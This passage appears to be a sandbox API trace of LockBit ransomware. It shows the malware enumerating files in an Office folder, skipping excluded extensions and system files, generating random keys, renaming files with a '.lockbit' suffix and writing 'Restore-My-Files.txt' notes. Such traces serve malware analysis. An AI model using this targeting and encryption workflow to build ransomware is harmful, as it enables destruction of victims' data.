Office\\MEDIA\\OFFICE14\\BULLETS\\BD15172_.GIF.lockbit") returned 78 [0204.003] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15172_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15172_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0204.004] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.004] malloc (_Size=0x40068) returned 0x3df0008 [0204.004] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=304) returned 1 [0204.004] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.005] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.008] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15172_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15172_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.008] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.008] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.008] free (_Block=0x1fa2ed8) [0204.008] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15172_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.008] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.008] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77a44f00, ftCreationTime.dwHighDateTime=0x1bd4f40, ftLastAccessTime.dwLowDateTime=0xbcb1b380, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x77a44f00, ftLastWriteTime.dwHighDateTime=0x1bd4f40, nFileSizeHigh=0x0, nFileSizeLow=0x8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15173_.GIF", cAlternateFileName="")) returned 1 [0204.008] lstrcmpiW (lpString1=".", lpString2="BD15173_.GIF") returned -1 [0204.008] lstrcmpiW (lpString1="..", lpString2="BD15173_.GIF") returned -1 [0204.008] PathFindExtensionW (pszPath="BD15173_.GIF") returned=".GIF" [0204.008] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.009] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.009] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15173_.GIF") returned 1 [0204.010] lstrcmpiW (lpString1="ntldr", lpString2="BD15173_.GIF") returned 1 [0204.010] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15173_.GIF") returned 1 [0204.010] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15173_.GIF") returned 1 [0204.010] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15173_.GIF") returned -1 [0204.010] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15173_.GIF") returned 1 [0204.010] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15173_.GIF") returned 1 [0204.010] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.010] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15173_.GIF") returned=".GIF" [0204.010] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.010] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.010] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.011] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.011] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.011] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.011] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.011] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.011] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.011] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.011] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.011] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15173_.GIF.lockbit") returned 78 [0204.011] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15173_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15173_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0204.012] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.012] malloc (_Size=0x40068) returned 0x3df0008 [0204.012] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=138) returned 1 [0204.013] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.013] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.013] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.014] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.017] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15173_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15173_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.017] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.017] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.017] free (_Block=0x1fa2ed8) [0204.017] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15173_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.017] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.017] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.017] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb476800, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcb1b380, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfb476800, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15272_.GIF", cAlternateFileName="")) returned 1 [0204.017] lstrcmpiW (lpString1=".", lpString2="BD15272_.GIF") returned -1 [0204.017] lstrcmpiW (lpString1="..", lpString2="BD15272_.GIF") returned -1 [0204.017] PathFindExtensionW (pszPath="BD15272_.GIF") returned=".GIF" [0204.017] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.017] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.017] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.017] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.017] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.017] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.017] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.017] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.017] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.017] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.017] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.018] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.018] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.018] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.018] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.018] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.018] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15272_.GIF") returned 1 [0204.018] lstrcmpiW (lpString1="ntldr", lpString2="BD15272_.GIF") returned 1 [0204.018] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15272_.GIF") returned 1 [0204.018] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15272_.GIF") returned 1 [0204.018] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15272_.GIF") returned -1 [0204.018] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15272_.GIF") returned 1 [0204.018] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15272_.GIF") returned 1 [0204.018] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.018] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15272_.GIF") returned=".GIF" [0204.018] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.019] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.019] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.019] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15272_.GIF.lockbit") returned 78 [0204.019] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15272_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15272_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0204.020] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.020] malloc (_Size=0x40068) returned 0x3df0008 [0204.020] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=456) returned 1 [0204.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.021] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.024] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15272_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15272_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.024] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.024] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.024] free (_Block=0x1fa2ed8) [0204.024] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15272_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.024] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.025] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc789500, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcb1b380, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfc789500, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15273_.GIF", cAlternateFileName="")) returned 1 [0204.025] lstrcmpiW (lpString1=".", lpString2="BD15273_.GIF") returned -1 [0204.025] lstrcmpiW (lpString1="..", lpString2="BD15273_.GIF") returned -1 [0204.025] PathFindExtensionW (pszPath="BD15273_.GIF") returned=".GIF" [0204.025] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.025] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.025] 